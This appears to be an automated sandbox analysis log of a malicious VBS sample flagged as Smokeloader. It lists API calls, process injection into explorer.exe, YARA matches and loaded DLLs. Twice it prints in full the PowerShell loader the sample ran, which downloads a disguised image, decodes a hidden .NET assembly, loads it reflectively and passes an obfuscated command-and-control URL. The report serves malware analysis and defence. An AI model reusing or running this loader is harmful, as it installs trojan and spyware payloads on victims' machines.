            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 11_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,11_2_004014EB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 11_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess,11_2_004022F7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 11_2_00402686 NtClose,11_2_00402686
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 11_2_004030BF RtlCreateUserThread,NtTerminateProcess,11_2_004030BF
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A04B92 RtlMoveMemory,NtUnmapViewOfSection,14_2_00A04B92
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A033C3 NtQueryInformationFile,14_2_00A033C3
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A0349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,14_2_00A0349B
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A0342B NtQueryObject,NtQueryObject,RtlMoveMemory,14_2_00A0342B
            Source: C:\Windows\explorer.exe | Code function: 16_2_009B38B0 NtUnmapViewOfSection,16_2_009B38B0
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 17_2_00801016 RtlMoveMemory,NtUnmapViewOfSection,17_2_00801016
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_00163D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,18_2_00163D8D
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_00162E1B OpenProcess,lstrcmpiA,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,18_2_00162E1B
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_00161F4E NtCreateSection,NtMapViewOfSection,18_2_00161F4E
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_00161FE5 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,18_2_00161FE5
            Source: C:\Windows\explorer.exe | Code function: 19_2_009E5300 NtUnmapViewOfSection,19_2_009E5300
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 20_2_00861016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,20_2_00861016
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 20_2_00861A80 NtCreateSection,NtMapViewOfSection,20_2_00861A80
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 20_2_00861819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,20_2_00861819
            Source: C:\Windows\explorer.exe | Code function: 24_2_009E355C NtUnmapViewOfSection,24_2_009E355C
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_001B1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,26_2_001B1016
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_001B18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,26_2_001B18BF
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_001B1B26 NtCreateSection,NtMapViewOfSection,26_2_001B1B26
            Source: C:\Windows\explorer.exe | Code function: 27_2_009D370C NtUnmapViewOfSection,27_2_009D370C
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A02198 14_2_00A02198
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A0C2F9 14_2_00A0C2F9
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A1B35C 14_2_00A1B35C
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A54438 14_2_00A54438
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A1B97E 14_2_00A1B97E
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A06E6A 14_2_00A06E6A
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A25F08 14_2_00A25F08
            Source: C:\Windows\explorer.exe | Code function: 16_2_009B1E20 16_2_009B1E20
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 17_2_0080170B 17_2_0080170B
            Source: C:\Windows\explorer.exe | Code function: 19_2_009E2C00 19_2_009E2C00
            Source: C:\Windows\explorer.exe | Code function: 24_2_009E2054 24_2_009E2054
            Source: C:\Windows\explorer.exe | Code function: 24_2_009E2860 24_2_009E2860
            Source: C:\Windows\explorer.exe | Code function: 27_2_009D2A04 27_2_009D2A04
            Source: C:\Windows\explorer.exe | Code function: 27_2_009D20F4 27_2_009D20F4
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 00A07F70 appears 32 times
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 00A08801 appears 40 times
            Source: sweetnessgoodforgreatnessthingswithgood.tIF.vbs | Initial sample: Strings found which are bigger than 50
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2508 -s 696
            Source: 0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: 0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
            Source: Process Memory Space: powershell.exe PID: 5128, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engine | Classification label: mal100.bank.troj.spyw.expl.evad.winVBS@27/21@2/2
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 17_2_0080274A CreateToolhelp32Snapshot,Process32First,lstrcmpiA,Process32Next,CloseHandle,17_2_0080274A
            Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00A04440 CoCreateInstance,SysAllocString,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,wsprintfW,14_2_00A04440
            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Roaming\VBScripting
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3380:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\uahuajd | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3812:120:WilError_03
            Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2508
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5d5mz2kh.02x.ps1
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs"
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 1FA.tmp.14.dr, 400.tmp.14.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: sweetnessgoodforgreatnessthingswithgood.tIF.vbsReversingLabs: Detection: 15%
            Source: sweetnessgoodforgreatnessthingswithgood.tIF.vbsVirustotal: Detection: 13%
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sweetnessgoodforgreatnessthingswithgood.tIF.vbs"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            Source: unknown | Process created: C:\Users\user\AppData\Roaming\uahuajd C:\Users\user\AppData\Roaming\uahuajd
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Users\user\AppData\Roaming\uahuajd | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2508 -s 696
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\explorer.exe | Section loaded: windows.internal.shell.broker.dll
            Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
            Source: C:\Windows\explorer.exe | Section loaded: webio.dll
            Source: C:\Users\user\AppData\Roaming\uahuajd | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\uahuajd | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\uahuajd | Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\uahuajd | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\uahuajd | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\uahuajd | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dxgi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wtsapi32.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: umpdc.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: dnsapi.dll
